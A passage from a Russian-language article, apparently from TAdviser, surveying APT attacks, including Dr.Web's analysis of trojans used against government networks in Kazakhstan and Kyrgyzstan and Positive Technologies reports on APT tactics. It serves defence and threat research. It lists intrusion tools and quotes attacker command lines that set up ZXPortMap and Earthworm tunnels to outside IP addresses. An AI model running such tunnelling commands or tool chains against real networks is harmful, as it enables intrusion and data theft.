Корпоративный шпионаж, как элемент недобросовестной конкурентной борьбы – на август 2020 года достаточно редкое явление в мире APT. Для RedCurl нет никакой разницы кого атаковать: российский банк или консалтинговую компанию в Канаде. Такие группы специализируются на корпоративном шпионаже, применяя техники сокрытия своей активности, в том числе, за счет использования легитимных инструментов, которые сложно детектировать. Содержимое чужих писем для них гораздо ценнее содержимого чужих кошельков. Несмотря на отсутствие прямого финансового ущерба, как в случае с финансово-мотивированными киберкриминальными группами, последствия шпионской деятельности могут исчисляться десятками миллионов долларов.

рассказал Рустам Миркасымов, руководитель отдела динамического анализа вредоносного кода компании Group-IB
»

На август 2020 года Group-IB продолжает фиксировать атаки RedCurl в разных странах мира.

Исследование APT-атак на государственные учреждения Казахстана и Киргизии

В марте 2019 года в компанию «Доктор Веб» обратился клиент из государственного учреждения Республики Казахстан по вопросу наличия вредоносного ПО на одном из компьютеров корпоративной сети. Об этом «Доктор Веб» сообщил TAdviser 22 июля 2020 года. Это обращение послужило поводом к началу расследования, по результатам которого специалисты компании обнаружили и впервые описали группу троянских программ, использующихся для полномасштабной целевой атаки на учреждение. Имеющиеся в распоряжении «Доктор Веб» материалы позволили получить представление об инструментах и целях злоумышленников, проникших во внутреннюю компьютерную сеть. В ходе расследования было установлено, что сетевая инфраструктура учреждения была скомпрометирована как минимум с декабря 2017 года.

«Доктор Веб» изучил целевые кибератаки на госучреждения Казахстана и Киргизии

Кроме того, в феврале 2020 года в компанию «Доктор Веб» обратились представители государственного учреждения Киргизской Республики с признаками заражения корпоративной сети. Экспертиза «Доктор Веб» установила наличие в сети ряда вредоносных программ, некоторые модификации которых также использовались в атаке на организацию в Казахстане. Анализ показал, что, как и в предыдущем случае, заражение началось задолго до обращения — в марте 2017 года.

Учитывая, что несанкционированное присутствие в обеих инфраструктурах продолжалось на протяжении как минимум трех лет, а также то, что при изучении отчетов с серверов были выявлены совершенно разные семейства троянских программ, в «Доктор Веб» допускают, что за этими атаками могут стоять сразу несколько хакерских групп. При этом некоторые из использованных троянов хорошо известны: часть из них является инструментами известных APT-групп, другая часть — используется различными APT-группами Китая.

Компании удалось подробно изучить информацию с нескольких внутрисетевых серверов, принадлежащих пострадавшим учреждениям Казахстана и Киргизии. Все рассматриваемые в исследовании устройства работают под управлением операционных систем Microsoft Windows.

Вредоносные программы, которые применялись в таргетированной атаке, можно условно разделить на две категории:

  • массовые, которые ставили на большинство компьютеров сети;
  • специализированные, которые ставили на серверы, представляющие особый интерес для атакующего.

Изученные образцы вредоносных программ и используемые злоумышленниками утилиты позволяют предполагать следующий сценарий атаки. После эксплуатирования уязвимостей и получения доступа к компьютеру сети злоумышленники загружали на него одну из модификаций трояна семейства BackDoor.PlugX. Модули полезной нагрузки трояна позволяли удаленно управлять инфицированным компьютером и использовать его для дальнейшего продвижения по сети. Другим трояном, предположительно использующимся для первичного заражения, был BackDoor.Whitebird.1. Бэкдор предназначался для 64-разрядных операционных систем и имел достаточно универсальную функциональность: поддержку зашифрованного соединения с управляющим сервером, а также функции файлового менеджера, прокси и удаленного управления через командную оболочку.

После установления присутствия в сети хакерская группа использовала специализированное вредоносное ПО для решения поставленных задач. Распределение специализированных троянских программ по инфицированным устройствам представлено ниже.

  • Контроллер домена #1:
    • Trojan.Misics
    • Trojan.XPath

  • Контроллер домена #2:

    • Trojan.Misics
    • Trojan.Mirage

  • Контроллер домена #3:

    • BackDoor.Mikroceen
    • BackDoor.Logtu

  • Сервер #1:

    • BackDoor.Mikroceen

  • Сервер #2:

    • Trojan.Mirage

  • BackDoor.CmdUdp.1

Из указанных троянов особого внимания заслуживает семейство XPath, представители которого, по информации специалистов «Доктор Веб», ранее публично описаны не были. Семейство обладает руткитом для сокрытия сетевой активности и следов присутствия в скомпрометированной системе, обнаружить который удалось при помощи антируткита Dr.Web, установленного на атакованном сервере. Изученные образцы были скомпилированы в 2017-2018 годах. При этом в основе этих программ лежат проекты с открытым исходных кодом, вышедшие на несколько лет раньше. Так, в исследованных образцах использовались версии пакета WinDivert 2013-2015 годов. Это косвенно указывает на то, что первые модификации XPath также могли быть разработаны в этот период.

XPath является модульным трояном, каждый компонент которого соответствует определенной стадии работы вредоносной программы. Процесс заражения начинается с работы установщика компонентов, детектируемого как Trojan.XPath.1. Установщик использует зашитую в его теле зашифрованную конфигурацию и запускает полезную нагрузку либо путем установки драйвера, либо методом COM Hijacking. Программа использует системный реестр для хранения своих модулей, при этом используется как шифрование, так и сжатие данных.

Trojan.XPath.2 является драйвером и служит для сокрытия присутствия вредоносной активности в скомпрометированной системе, параллельно запуская другой модуль. Драйвер имеет китайские цифровые подписи, а его работа основана на проектах с открытым исходным кодом. В отличие от других компонентов, хранимых в системном реестре, файлы драйвера располагаются на диске, при этом программа работает скрытно. Помимо сокрытия файла драйвера на диске в задачи компонента входит внедрение загрузчика полезной нагрузки в процесс lsass.exe, а также маскировка сетевой активности трояна. Сценарий работы меняется в зависимости от версии операционной системы.

Оригинальное название третьего компонента — PayloadDll.c. Библиотека, детектируемая как Trojan.XPath.3, является промежуточным модулем и служит для внедрения в процесс svhost.exe полезной нагрузки, которая сохранена в реестре, методом COM Hijacking.

Основная функциональность содержится в модуле полезной нагрузки, детектируемом как Trojan.XPath.4. Компонент написан на C++, и в его основе также лежат проекты с открытым исходным кодом. Как и большинство рассмотренных в исследовании вредоносных программ, этот троян предназначен для получения несанкционированного доступа к зараженным компьютерам и кражи конфиденциальных данных. Его особенностью является способность функционировать в двух режимах. Первый — работа в режиме клиента (Client Mode). В этом режиме троян соединяется с управляющим сервером и ожидает входящие команды. Второй — работа в режиме агента (Agent Mode). В этом режиме Trojan.XPath.4 выполняет функции сервера: он прослушивает определенные порты, ожидая подключения к ним других клиентов и отправляя им команды. Таким образом, разработчики предусмотрели сценарий развертывания локального управляющего сервера внутри атакуемой сети для перенаправления команд от внешнего управляющего сервера зараженным компьютерам внутри сети.

Среди других интересных находок — особенность реализации доступа к командной оболочке трояна Mirage. Для перенаправления ввода-вывода командной оболочки вредоносная программа использовала файлы, которые мы смогли получить с зараженного сервера. Таким образом удалось увидеть команды, выполнявшиеся злоумышленниками с помощью представленной функции трояна, а также полученные в ответ данные:

Запускавшийся windbg.exe файл представлял собой сканер TCP/UPD-портов PortQry.

В ходе расследования специалисты «Доктор Веб» обнаружили свидетельства, косвенно подтверждающие связь таргетированных атак на учреждения государств Центральной Азии. Так, один из найденных образцов BackDoor.PlugX.38 использовал в качестве управляющего сервера домен nicodonald[.]accesscam[.]org, который использовался и в качестве управляющего сервера для BackDoor.Apper.14, также известного под названием ICEFOG NG. Несколько лет назад бэкдор этого семейства был обнаружен в фишинговом письме, направленном в одно из государственных учреждений Казахстана. Кроме того, RTF-документ, устанавливающий этот образец BackDoor.Apper.14, впервые был загружен на VirusTotal из Казахстана 19 марта 2019 года.

Интересной находкой в рамках инцидента в Киргизии стал бэкдор Logtu, обнаруженный на зараженном сервере вместе с Mikroceen. Помимо похожего набора вредоносного ПО, использующегося злоумышленниками, именно Mikroceen позволяет говорить о возможной связи двух атак: образец этого узкоспециализированного бэкдора был найден в обеих сетях и в обоих случаях устанавливался на контроллер домена.

В ходе поиска образцов, имеющих отношение к данным атакам, был найден специально подготовленный бэкдор, реализующий BIND Shell-доступ к командной оболочке. Путь до отладочных символов содержит название проекта на китайском языке — 正向马源码, что может указывать на соответствующее происхождение трояна.

Помимо вредоносного ПО для дальнейшего продвижения по сети злоумышленники использовали следующие публично доступные утилиты:

  • Mimikatz
  • TCP Port Scanner V1.2 By WinEggDrop
  • Nbtscan
  • PsExec
  • wmiexec.vbs
  • goMS17-010
  • ZXPortMap v1.0 By LZX
  • Earthworm
  • PortQry version 2.0 GOLD

Ниже представлены примеры запуска некоторых из перечисленных утилит.

  • ZXPortMap: vmwared.exe 21 46.105.227.110 53
  • Earthworm: cryptsocket.exe -s rssocks -d 137.175.79.212 -e 53

APT-группа также активно использовала собственные PowerShell-скрипы для сбора информации об инфицированном компьютере, других устройствах сети, проверки управляющих серверов с зараженного компьютера и подобных задач. Кроме того, был найден PowerShell-скрипт, предназначенный для выгрузки из Microsoft Exchange Server всего содержимого почтовых ящиков нескольких сотрудников организации.

В ходе расследования специалистам «Доктор Веб» удалось найти сразу несколько семейств троянских программ, используемых в этих атаках. Анализ образцов и вредоносной активности показал, что взлом сетевой инфраструктуры произошел задолго до обнаружения первых признаков заражения сотрудниками организации. К сожалению, такой сценарий — один из атрибутов успешных APT-атак, так как значительные ресурсы вирусописателей всегда направлены на сокрытие своего присутствия в системе.

За скобками исследования остался первичный вектор заражения, а также общая картина заражения всей инфраструктуры. Мы уверены, что описанные в исследовании трояны — лишь часть вредоносного ПО, задействованного в этих атаках. Механизмы, используемые хакерами, многократно затрудняют не только обнаружение несанкционированного вторжения, но и возврат контроля над сетевыми объектами.

Для минимизации рисков необходим постоянный мониторинг внутрисетевых ресурсов, в особенности тех серверов, которые представляют повышенный интерес для злоумышленников, — контроллеры домена, почтовые серверы, интернет-шлюзы. В случае компрометации системы необходим оперативный и правильный анализ ситуации для разработки адекватных мер противодействия.

2019

Исследование TAdviser и Microsoft: 39% российских СМБ-компаний столкнулись с целенаправленными кибератаками

Согласно результатам исследования TAdviser и Microsoft, проведенного осенью 2019 года, за год с целенаправленными атаками столкнулись 39% компаний сегмента малого и среднего бизнеса. По данным компании Positive Technologies, более 50% СМБ-компаний присваивают риску APT-атаки* высокий уровень опасности.

Рост целенаправленных атак по итогам третьего квартала

22 ноября 2019 года эксперты Positive Technologies подвели итоги третьего квартала 2019 года. В числе главных тенденций отмечены рост количества уникальных киберинцидентов, высокая активность APT-кибергруппировок, специализирующихся на целенаправленных атаках, а также двукратное преобладание доли кибератак, направленных на кражу информации, над долей финансово мотивированных кампаний.

Динамика атак по данным Positive Technologies

Главный тренд — преобладание целенаправленных атак над массовыми. Их доля составляет 65% против 59% во II квартале. По данным Positive Technologies, наибольший интерес для злоумышленников представляют государственные учреждения, промышленные компании, финансовый сектор и сфера науки и образования. На протяжении III квартала эксперты PT Expert Security Center (PT ESC) регулярно фиксировали атаки APT-группы TA505. В арсенале группировки банковский троян Dridex, шифровальщик Cryptomix, код которого подписан сертификатами, выданными на подставные юрлица, трояны для удаленного управления ServHelper и FlawedAmmyy, а также плагин Upxxec, способный детектировать и отключать большое число антивирусных средств защиты. Кроме того, специалисты PT ESC зафиксировали кибератаки APT-групп RTM, Cobalt, Bronze Union, APT-C-35, KONNI, Gamaredon и других.

В третьем квартале 2019 года доля кибератак, направленных на кражу информации, выросла до 61% в атаках на юридические лица и до 64% в атаках на частных лиц (58% и 55% во втором квартале). При этом доля финансово мотивированных кампаний не превышает 31%.

Категории жертв атак по данным Positive Technologies

При атаках на юридические лица четверть от общего объема похищенной информации составляют персональные данные. Каждая пятая атака была направлена против частных лиц, при этом почти половина (47%) всех украденных у них данных — это учетные данные в различных системах (логины и пароли).

Эксперты Positive Technologies зафиксировали снижение доли атак с применением майнеров криптовалюты — до 3% в случае организаций и до 2% в кампаниях, нацеленных на частных лиц. Этот факт может быть связан с постепенным переходом злоумышленников на ВПО, которое способно выполнять сразу несколько функций. Например, троян Clipsa умеет скрытно «майнить» криптовалюту, воровать пароли, подменять адреса криптокошельков, а также запускать брутфорс-атаки против сайтов на базе WordPress.

«
«По прежнему популярны методы социальной инженерии: в третьем квартале доля атак на юрлица с их применением выросла почти вдвое — до 69% (с 37% в предыдущем квартале). В 81% случаев заражение инфраструктуры компаний вредоносным ПО начинается с фишингового письма»,

отметила Яна Авезова, аналитик Positive Technologies
»

Типы вредоносного ПО, используемого для атак

Растет доля заражений вредоносным ПО. Три четверти атак на юридические лица и 62% атак на частных лиц сопровождались заражениями различного рода зловредами. Если заражение инфраструктуры компании начинается, как правило, с фишингового письма, то частные лица чаще становятся жертвами в результате посещения скомпрометированных веб-ресурсов (в 35% атак против частных лиц).

Также эксперты Positive Technologies обнаружили, что в конце лета после нескольких месяцев затишья возобновил активность один из крупнейших ботнетов в мире под названием Emotet. Операторы ботнета работают по схеме malware as a service (MaaS) и предоставляют киберпреступникам доступ к компьютерам, зараженным Emotet, для их дальнейшего инфицирования другими вредоносами, например Trickbot или Ryuk.

По оценкам исследователей, информация о большинстве кибератак на организации не предается огласке из-за репутационных рисков.

Анализ особенностей APT-атак в промышленности и ТЭК

18 ноября 2019 года компания Positive Technologies сообщила, что ее эксперты проанализировали деятельность APT-группировок, атакующих российские организации на протяжении последних двух лет. Девять из них фокусируются на организациях топливно-энергетического комплекса (ТЭК), а 13 объединений злоумышленников видят целью промышленные компании. Некоторые группировки атаковали и промышленные, и энергетические компании.

В двух последних исследованиях специалисты Positive Technologies описали специфику APT-атак на промышленные компании и организации ТЭК. Помимо этого, эксперты провели опрос среди посетителей сайта компании Positive Technologies, аудитории интернет-портала SecurityLab.ru и участников ряда отраслевых сообществ.

По данным этого опроса, более половины (60%) респондентов из сферы промышленности и топливно-энергетического комплекса признают, что вероятность успешной кибератаки достаточно высока. При этом лишь 11% участников опроса уверены в том, что их предприятие сможет противостоять APT-атаке.

Большинство представителей организаций считают, что основной целью APT-группировки при атаке на их компании будет являться нарушение технологических процессов и вывод из строя инфраструктуры. При этом 55% участников опроса сообщили, что их организации уже становились жертвами атак. Каждый четвертый участник отметил, что одним из итогов такой атаки стал простой инфраструктуры.

При этом во многих компаниях используются лишь базовые средства защиты, которые практически бесполезны для противодействия таким сложным угрозам, как APT. Так, лишь 5% респондентов, работающих в промышленных и топливно-энергетических компаниях, сообщили, что в их организациях используются специализированные инструменты борьбы с целевыми атаками.

На практике типовые защитные решения оказываются неэффективными для противодействия APT-атакам. Кибергруппировки запутывают код своего вредоносного ПО, чтобы антивирусные решения на компьютерах сотрудников не могли распознать угрозу в момент атаки. Пять из девяти группировок, нацеленных на ТЭК, используют вредоносное ПО, выполняющееся сразу в оперативной памяти и не оставляющее следов на жестком диске. Киберпреступники добавляют в зловред специальные модули для определения версии используемого в системе антивируса, а также модули для обнаружения выполнения в «песочнице» и виртуальной среде, что позволяет обойти динамические проверки систем защиты в момент атаки.

Большинство APT-группировок шифруют канал связи с командными серверами, чтобы скрыть вредоносный трафик и обмануть системы обнаружения вторжений. При атаках на промышленные компании каждая вторая группа (46%) с этой целью использует известные алгоритмы шифрования, а 38% — их модифицированные версии. Вредоносный трафик часто маскируется под легитимный: при атаках на промышленный сектор 77% APT-группировок обмениваются информацией с командным центром по широко распространенным протоколам. Отдельные группировки, нацеленные на сектор ТЭК, размещают командные серверы по адресам, которые схожи с названиями известных в отрасли компаний.

Злоумышленников не останавливает даже полная изоляция технологического сегмента сети от ее корпоративного сегмента и интернета. Если их цель находится в промышленном сегменте, то в компанию могут быть подброшены съемные носители (например, флешки) с вредоносным ПО, или их может подключить к USB-разъемам критически важных систем внедрившийся в компанию инсайдер (техника Replication Through Removable Media).

По словам директора экспертного центра безопасности Positive Technologies (PT Expert Security Center) Алексея Новикова, зачастую более эффективным подходом к обнаружению APT является выявление активности злоумышленников уже после проникновения в инфраструктуру:

«
Выявить APT-атаку в момент проникновения нарушителя в компанию — крайне сложная задача, но если цель злоумышленника — надежно закрепиться в ИТ-инфраструктуре и контролировать ключевые системы максимально длительное время, то обнаружить его можно и на более поздних этапах атаки, например при его перемещении между серверами уже во внутренней сети. Такие перемещения непременно оставляют артефакты в сетевом трафике и на самих узлах, это позволяет обнаружить произошедшее ранее проникновение ретроспективно и устранить угрозу до того, как злоумышленник перейдет к активным деструктивным действиям или украдет важную информацию.
»

APT-группировка Calypso атакует госучреждения 6 стран

31 октября 2019 года компания Positive Technologies (PT Expert Security Center) сообщила, что её специалисты экспертного центра безопасности выявили APT-группировку, получившую название Calypso. Группировка действует с 2016 года и нацелена на государственные учреждения. На октябрь 2019 года она действует на территории шести стран.

По данным экспертов, от действий группировки уже пострадали организации из Индии (34% жертв), Бразилии, Казахстана (по 18%), России, Таиланда (по 12%) и Турции (6%). Злоумышленники взламывали сетевой периметр и размещали на нем специальную программу, через которую получали доступ к внутренним сетям скомпрометированных организаций. Как показало расследование, злоумышленники продвигаются внутри сети либо с помощью эксплуатации уязвимости удаленного исполнения кода MS17-010, либо с помощью украденных учетных данных.

«
Успеху атак этой группировки во многом способствует тот факт, что большинство утилит, применяемых ею для продвижения внутри сети, широко используются специалистами по всему миру для сетевого администрирования. Группировка использовала общедоступные утилиты и эксплойты, например SysInternals, Mimikatz; EternalBlue, EternalRomance. При помощи распространенных эксплойтов преступники заражают компьютеры в локальной сети организации и похищают конфиденциальные данные,
рассказал ведущий специалист группы исследования киберугроз Денис Кувшинов
»

По словам специалистов Positive Technologies, организация может предотвратить такие атаки при помощи специализированных систем глубокого анализа трафика, которые позволят вычислить подозрительную активность на начальной стадии проникновения злоумышленников в локальную сеть и не дадут им закрепиться в инфраструктуре компании. Кроме того, обнаружить атаки и противодействовать им помогут мониторинг событий ИБ, защита периметра и веб-приложений.

Согласно полученным данным, выявленная APT-группировка предположительно имеет азиатские корни и относится к числу китайскоговорящих. В одной из атак группировка использовала вредоносную программу PlugX, которую традиционно используют многие APT-группы китайского происхождения, а также троян Byeby, который применялся во вредоносной кампании SongXY в 2017 году. Кроме того, во время отдельных атак злоумышленники по ошибке раскрывали свои реальные IP-адреса, принадлежащие китайским провайдерам.

Техники APT-группировок при атаках на кредитно-финансовые организации

10 октября 2019 года компания Positive Technologies сообщила, что её эксперты проанализировали тактики и техники десяти APT-группировок, атаковавших финансовые компании за последние два года[18], и выяснили, что каждая из них прибегает к фишингу, а в поисках банковских систем в сети преступники используют легитимные утилиты для администрирования и скомпрометированные учетные данные.

Рисунок 1. Топ-5 предполагаемых целей APT-группировок (доля респондентов, представляющих финансовые компании)

Исследователи рассказали о техниках, которые используют APT-группировки, чтобы проникнуть в ИТ-инфраструктуру финансовых компаний, и как они действуют внутри, а также выяснили, на каких этапах можно выявить атаку и предотвратить кражу денег.

Рисунок 2. Топ-5 последствий кибератак (доля респондентов, представляющих финансовые компании)

Самым распространенным и эффективным способом проникновения во внутреннюю сеть любой компании эксперты назвали фишинг.

«
По нашим данным, 75% банков уязвимы к фишинговым атакам. Этот метод настолько зарекомендовал себя среди киберпреступников, что к нему прибегала каждая исследованная нами APT-группировка, замеченная в атаках на кредитно-финансовую сферу,
говорит старший аналитик компании Positive Technologies Екатерина Килюшева
»

Согласно исследованию Positive Technologies, в финансовых организациях выделяется большой бюджет на информационную безопасность, и их системы защиты находятся на высоком уровне. По мнению директора экспертного центра безопасности Positive Technologies (PT Expert Security Center) Алексея Новикова, этим объясняется большое количество используемых APT-группировками техник для обхода средств защиты.

Рисунок 3. Средства защиты, используемые в компаниях (доля респондентов, представляющих финансовую отрасль)
«
Например, чтобы избежать обнаружения антивирусом, вредоносное ПО доставляется в инфраструктуру в упакованном и зашифрованном виде (техники obfuscated files or information и software packing). Злоумышленники могут выдавать вредоносный код за легитимное ПО, подписав его цифровым сертификатом реально существующей компании (техника code signing). Для сокрытия каналов управления и дополнительной маскировки могут использоваться известные веб-сервисы, как в случае с группировкой Carbanak, которая использовала сервисы Google Docs и Pastebin для хранения своих скриптов,
отмечает Алексей Новиков
»

Рисунок 4. Распространенные категории жертв (доля группировок)

По статистике, в течение нескольких дней, а иногда и недель злоумышленники изучают сеть, готовясь к краже. Преступники активно перемещаются между узлами сети в поисках банковских систем, используя легитимные утилиты для администрирования (техники service execution и Windows admin shares) и скомпрометированные учетные записи. По мнению специалистов, именно на этом этапе злоумышленники оставляют множество следов, и можно заметить подозрительные действия в системе. Постоянный мониторинг событий ИБ, а также глубокий анализ сетевого трафика в реальном времени и в ретроспективе могут распознать APT-атаку до того, как преступники получат доступ к банковским системам.

«
ФинЦЕРТ организует удобный и эффективный канал обмена информацией об угрозах между финансовыми организациями. Однако важно не только знать о последних индикаторах компрометации, но и использовать технические решения, которые умеют применять такие индикаторы, а самое главное осуществлять поиск этих индикаторов в прошлом. Такой подход помогает выявить присутствие злоумышленников в инфраструктуре даже в том случае, если в момент проведения атаки о ней ничего не было известно,
подчеркивает Алексей Новиков
»

Согласно полученным данным, в некоторых финансовых организациях используются лишь базовые средства защиты, которых недостаточно для своевременного выявления сложных целенаправленных атак и полноценного анализа произошедших событий. Лишь 22% респондентов, представляющих финансовую отрасль, считают, что их компания в состоянии отразить атаки APT-группировок. При этом 63% респондентов на практике сталкивались с последствиями кибератак, и 34% признали, что организация понесла прямые финансовые потери.

По данным Positive Technologies:

  • 5 из 10 группировок используют скомпрометированные ресурсы сторонних компаний для распространения вредоносного ПО
  • 9 из 10 группировок используют вредоносные скрипты (Scripting)
  • 8 из 10 группировок шифруют вредоносное ПО (Obfuscated Files or Information)
  • 6 из 10 группировок внедряют вредоносный код в память легитимного процесса (Process Injection)
  • 5 из 10 группировок маскируют сервисы (Masquerading)
  • 4 из 10 группировок подписывают вредоносный код цифровым сертификатом (Code Signing)
  • 4 из 10 группировок используют популярные веб-сервисы для хранения вредоносных файлов (Web Service)
  • 4 из 10 группировок проверяют наличие песочницы (Virtualization/Sandbox Evasion)

2017: Технология защиты от угроз удаленного администрирования от ЛК

13 декабря 2017 года стало известно о регистрации патента «Лаборатории Касперского» на технологию защиты от целевых атак.

Продукт основан на алгоритмах машинного обучения и автоматизирует обнаружение одного из опасных киберпреступных инструментов — утилит для скрытного удаленного управления компьютером. При этом технология работает даже в тех случаях, когда преступники передают данные по зашифрованным каналам связи.

Утилиты для удаленного управления компьютером используются организаторами целевых атак, чтобы незаметно осуществлять вредоносную активность на устройствах жертв. После установки программа получает на компьютере администраторские права и дает злоумышленникам возможность искать на нем конфиденциальную информацию, которая затем передается на командный сервер. Такой сценарий опасен для корпоративных сетей.

Технология «Лаборатории Касперского» анализирует активность всех приложений на компьютере пользователя и выявляет случаи аномального поведения. Она обнаруживает все зависимости между событиями на устройстве. Сравнивая их с устоявшимися поведенческими шаблонами, технология принимает решение о детектировании удаленной атаки на компьютер. Затем устанавливается, какое именно приложение используется для удаленного администрирования. Опасность могут представлять как неизвестные утилиты, так и скомпрометированные доверенные программы или их отдельные компоненты[19].

2016: Оценка российского рынка хищений

2015: Обзор нарождающихся угроз APT-класса

В первой половине 2010-х Центр глобальных исследований и анализа угроз «Лаборатории Касперского» отслеживал деятельность более 60 преступных групп, ответственных за кибератаки, проводимые по всему миру. Их участники говорят на разных языках: русском, китайском, немецком, испанском, арабском, персидском и других.

Наблюдение за деятельностью этих преступных групп позволило компании составить список, отражающий нарождающиеся угрозы APT-класса. Вот основные из них:

  • Слияние киберпреступности и APT-угроз: с конечных пользователей вектор атак смещается на проведение целевых атак против самих банков;

  • Фрагментация крупных APT-группировок: в результате успешной деятельности по расследованию крупных инцидентов и публикации информации о крупных хакерских группах и их лидерах, некоторые из наиболее крупных и известных APT-группировок распадутся на более мелкие группы, действующие независимо друг от друга. Результатом станут атаки по более широкому фронту. Соответственно, пострадает большее число компаний, поскольку атаки более мелких групп будут более диверсифицированными.

  • Развитие вредоносных методов и приемов: в ближайшее время в компании ожидали появления более сложных внедряемых вредоносных модулей, усовершенствованных методов обхода защиты и более активного использования виртуальных файловых систем (в качестве примеров можно привести кампании Turla и Regin) для сокрытия ценного инструментария и украденных данных.

  • Новые методы передачи краденых данных: давно прошли те времена, когда злоумышленники могли просто установить бэкдор в корпоративной сети и начать загружать терабайты данных на разбросанные по всему миру FTP-серверы. Сегодня продвинутые группировки регулярно используют SSL, а также нестандартные протоколы передачи данных. В ближайшие годы еще ряд группировок включат в свой арсенал использование облачных сервисов, что позволит им более эффективно скрывать отправку данных, украденных у жертв.

  • Новые APT-кампании из неожиданных источников: в 2014 году мы столкнулись с тем, что несколько стран публично выразили заинтересованность в обладании возможностями по проведению атак APT-класса. Мы прогнозируем, что в «гонку кибервооружений» вступят новые страны, которые обзаведутся инструментами для кибершпионажа.

  • Атаки «под чужим флагом»: учитывая растущее стремление государственных органов публично обличать злоумышленников, мы считаем, что APT-группировки внесут соответствующие изменения в организацию своей деятельности и будут чаще проводить вредоносные кампании, в ходе которых атакующие могут применять «неактивное» вредоносное ПО, обычно используемое другими APT-группировками для запутывания следов и усложнения атрибуции.

  • Добавление атак на мобильные устройства в арсенал APT-группировок: мы ожидаем активного применения вредоносного ПО для мобильных устройств, прежде всего для устройств под управлением Android и прошедшей джейлбрейк iOS.

  • APT+ботнет: точно рассчитанная атака + массовая слежка. В этом году к тенденции использования точечных атак в сочетании с привлекающими к себе внимание кампаниями и организацией собственных ботнетов присоединятся новые APT-группировки.

  • Коммерциализация APT-кампаний и частный сектор: за последние годы мы опубликовали много материалов о вредоносных программах, созданных такими компаниями, как HackingTeam и Gamma International – наиболее известными производителями «легального» шпионского ПО. Это высокодоходный бизнес с низким уровнем риска. Поэтому можно ожидать появления новых игроков на рынке «легальных» средств слежки.

2014: Данные Лаборатории Касперского

Летом 2014 года Лаборатория Касперского (Kaspersky) опубликовала исследование "Информационная безопасность бизнеса". В период с апреля 2013 по май 2014 года было опрошено 3900 респондентов (представителей компаний, обладающих знаниями в отношении рисков информационной безопасности и имеющих влияние на ИТ-процессы в своих организациях) из 27 стран мира, в том числе России.

В тройке самых приоритетных задач ИТ-менеджеров по сравнению с предыдущим годом произошли кардинальные изменения. 41% опрошенных назвало защиту данных от таргетированных атак главным приоритетом. Год назад этот пункт не входил в список приоритетов ИТ-менеджеров. Прежде всего защиту от целевых атак назвали своим приоритетом представители среднего бизнеса (43%) и крупных предприятий (38%). Малый бизнес вопрос таргетированных атак интересует в меньшей степени (32%).

Источник: Лаборатория Касперского, 2014

При этом среди внешних инцидентов ИТ-безопасности таргетированные атаки не являются массовыми (10%). По-прежнему по числу инцидентов преобладают вредоносное ПО (77%), спам (74%) и фишинговые атаки (28%). Рост внимания к целевым атакам, по словам аналитиков Лаборатории Касперского, связан в первую очередь с последствиями.Например, нападение высокотехнологичных хакеров на крупного ритейлера Target позволило завладеть злоумышленникам персональными данными 70 млн клиентов этого сетевого магазина.

Источник: Лаборатория Касперского, 2014

ИТ-специалисты отмечают, что таргетированные атаки составляют незначительную долю среди сверившихся инцидентов. Однако большинство опрошенных отмечает, что для предотвращения целевых атак и своевременного обнаружения попыток взлома, потребуются средства защиты более высокого класса, чем антивирусное ПО. Эксперты Лаборатории Касперского уверены, что для минимизации рисков в случае целенаправленных атак компаниям следует применять комплексный подход к обеспечению информационной безопасности.

Источник: Лаборатория Касперского, 2014

2011: Число целевых атак увеличилось с 77 до 82 в день

Количество целевых атак растёт, к концу 2011 года их количество увеличилось с 77 до 82 в день. Целевые атаки используют социальную инженерию и специализированное вредоносное ПО для получения несанкционированного доступа к конфиденциальной информации. Традиционно такие атаки были направлены на госсектор и правительственные органы, однако в 2011 году их фокус расширился.

Целевые атаки не ограничиваются крупными организациями. Более половины таких атак направлены на организации с менее чем 2,5 тысячами сотрудников и почти 18% на организации с менее чем 250 сотрудниками. Эти организации могут подвергаться атакам, поскольку они находятся в цепочке поставок или являются партнерами экосистемы крупных компаний, при этом имеют более слабые системы защиты. Кроме того, 58% таких атак нацелено на простых сотрудников: отдела кадров, связей с общественностью и продаж. Люди на этих рабочих местах могут не иметь доступа к нужной информации, но могут сработать в качестве входа внутрь компании. Злоумышленники могут достаточно просто найти их контакты в сети, к тому же, данные сотрудники привыкли получать запросы или какие-то файлы от неизвестных лиц.

Смотрите также

Контроль и блокировки сайтов

Анонимность

Критическая инфраструктура

Импортозамещение


Информационная безопасность и киберпреступность

* Регулирование интернета в Казахстане, KZ-CERT




Примечания

  1. ООО «НПП «ИТБ» разработало и реализовало новую технологию защиты от целевых атак
  2. Hellhounds: Операция Lahat. Атаки на ОС Windows
  3. [1]
  4. APT Cloud Atlas: Unbroken Threat
  5. Импортозамещение для кибератак: новая группировка Quartz Wolf использует старое отечественное ПО
  6. Новая APT-группировка Dark Pink наносит киберудары по азиатским правительственным и военным структурам
  7. Группа Turla Team использует закрытые домены 2013 года для атак на жертвы старого ботнета
  8. [2]
  9. Log4Shell остается грозным оружием в руках иранских киберпреступников
  10. Кибератаки на промышленность в 2022: злоумышленники усилили натиск на нефтегазовую отрасль и системы автоматизации зданий
  11. Северокорейская APT-группа атакует политические и дипломатические организации Южной Кореи
  12. В "Лаборатории Касперского" заподозрили хакеров из Китая в атаках на сайты госорганов
  13. Российские хакеры развернули масштабную целевую фишинговую кампанию
  14. Хакерские группировки наживаются на конфликте на территории Украины
  15. Иранские APT-группировки стали чаще атаковать IT-сектор
  16. Три китайские APT-группировки атаковали крупные телекоммуникационные компании
  17. Целевые шпионские спам-кампании угрожают предприятиям ТЭК РФ
  18. APT-атаки на кредитно-финансовую сферу в России: обзор тактик и техник
  19. «Лаборатория Касперского» разработала технологию защиты от угроз удаленного администрирования Узнать больше